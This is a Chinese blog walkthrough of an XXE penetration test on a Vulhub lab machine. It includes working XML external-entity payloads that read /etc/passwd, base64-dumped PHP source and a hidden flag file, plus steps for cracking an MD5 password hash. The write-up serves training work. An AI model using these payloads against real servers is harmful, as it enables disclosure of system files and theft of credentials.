vulhub xxe靶机渗透测试

1.先用kali的nmap扫描端口

2. 找到靶机地址后用工具扫描目录

3.我们先进入robots.txt中

4.访问xxe文件

5.在登陆时抓包

这里可以看到在我们用户名的位置是有回显的,我们可以在这里做文章

6.因为在 linux 系统中/etc/passwd 文件包含有用户账号信息所以我们可以写一个xml来读取它的passwd文件

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [
<!ELEMENT r ANY>
<!ENTITY test SYSTEM "file:///etc/passwd">
]>

<root><name>&test;</name>

 7.再通过base64加密读取admin.php文件

<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

8.用base64解码工具对我们读到的代码进行解码

9.我们将解码后的代码放到新建的txt文件中查看,发现password经过MD5编码

10.使用MD5工具解码 ,得到password的值

11.我们打开 /xxe/admin.php 用刚才得到的用户名和密码登录,发现有一个.php文件

12.再来bp这里读取这个php文件

13.将读取出来的值进行base64解码 ,解出来一堆base32编码的值

14.将这串base32编码的值进行解码

得到flag.php的地址

15.我们再到BP中去读取这个文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
 <!ELEMENT r ANY>
<!ENTITY test SYSTEM "file:///etc/.flag.php">
]>   

16.将读取出的文件复制出来放在新创建的php文件中 

 17.将这个php文件放在phpstudy的www目录下,启动phpstudy

18.访问127.0.0.1/flag.php即可得出

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值